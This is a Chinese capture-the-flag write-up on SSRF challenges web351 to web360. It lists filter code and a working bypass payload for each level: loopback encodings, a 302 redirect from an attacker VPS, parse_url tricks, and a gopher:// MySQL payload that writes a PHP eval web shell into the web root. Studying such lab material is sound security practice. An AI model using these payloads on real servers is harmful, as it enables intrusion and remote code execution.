SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
web351
POST: url=file:///var/www/html/flag.php
web352
POST: url=http://127.0.0.1/flag.php
web353
ip进制变换
POST: url=http://0177.0.0.1/flag.php
web354 | 357
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
- 302跳转,vps搭一个
POST:<?php header("Location: http://127.0.0.1/flag.php");
url=http://your-domain/ssrf/302.php
- 由域名的可以解析一个记录,指向127.0.0.1(网上看的我没试,太麻烦了)
- Y4师傅找到一个A记录是127.0.0.1的网站:
http://sudo.cc/
,可以不用解析自己的了
web355 | 356
绕过小姿势
限制长度可以省略全为0的ip号,如127.1
0.0.0.0特殊ip,被保留,可当作127.0.0.1,或者直接写http://0/ –> http://127.0.0.1/
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
POST: url=http://127.1/flag.php
web358
POST: url=http://ctf.@127.1/flag.php?show
上面的wiki链接里面也写了,这个特性是blackhat峰会的一位大佬讲的,建议多看看,parse_url
解析问题
web359 | 360
Give MySQL username: root
Give query to execute: select '<?php eval($_POST[yq1ng]); ?>' into outfile '/var/www/html/yq1ng.php';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4f%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%79%71%31%6e%67%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%79%71%31%6e%67%2e%70%68%70%27%3b%01%00%00%00%01
这个MySQL一开始没打通,是因为gopher://127.0.0.1:3306/_
后面的需要再次urlencode,感谢y4带佬,打的位置在returl
,不是username
。后面的redis一样的,两次urlencode